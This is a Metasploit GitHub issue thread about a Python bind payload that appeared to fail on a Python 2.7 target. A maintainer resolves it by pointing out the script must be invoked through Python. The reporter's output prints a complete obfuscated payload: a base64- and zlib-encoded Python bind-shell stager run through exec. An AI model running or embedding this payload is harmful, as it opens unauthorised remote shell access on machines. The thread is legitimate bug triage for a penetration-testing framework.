### ISSUE TITLE
 Python bind payload syntax error

### ISSUE THREAD

**Issue by adfoster-r7** [rapid7/metasploit-framework#19383]
## Steps to reproduce

The Python bind payload didn't work on an empire target which was running Python 2.7, syntax error near to `__import__`

```
root@archvulndev:/opt/Empire# /tmp/WOGMoIpA                                                                                    
/tmp/WOGMoIpA: line 1: syntax error near unexpected token `__import__'              
/tmp/WOGMoIpA: line 1: `exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNpNj0FuwyAQRdfmFN4ZVAeF1KrSSCyiypWiqm3UeB/ZMFFQqEEMbq9fcLzo8v3/hhnMt3chlujUDWLZY4nELNE0+OAUIOY4EHQS+d2jyPev58NH29XIT58vb
+dT99Xu31mS+GBGTWklnjdcPG25aBr+WNVivWnY3FuDEUYqMtS91kGmsFcKfKSM/F6NhbILE+xIoXMVQP3QeZwU5lLaNKuZlOvUF0OA/kYKLwM/Op8brkE5DbSa4mW1rViNV7BW5gdrjNqMWT0c2wxuiv8IQlgoLXLS87uR9veasoeZk7MwKdJpCOmrjpE/RYNl4w==')[0])))'
root@archvulndev:/opt/Empire# python --version                                                                                
Python 2.7.12
```

Runtime environment:

```
git clone https://github.com/EmpireProject/Empire.git
cd Empire
git checkout 03ca7bdbcc81457da8e8c1419b36adf66fe9b110
docker run -it --net="host" --rm --name empireserv -v $PWD:/opt/Empire empireproject/empire /bin/bash
```

**Comment by smcintyre-r7** [comment]
I don't think there's an issue here or at least I wasn't able to reproduce it with the module.

![Image](https://github.com/user-attachments/assets/4bbf5963-6429-4245-8b69-6103dc3950f1)

The payload that's dropped to disk does not have the `#!` header and must be invoked using Python. You'll see the command in cron in the screenshot does this correctly however in your output you're attempting to invoke the script directly. I can however reproduce your error message if I try to invoke the script directly without Python.

**Comment by adfoster-r7** [comment]
Makes perfect sense; thanks for taking a look and sorry for the churn here! cc @cdelafuente-r7
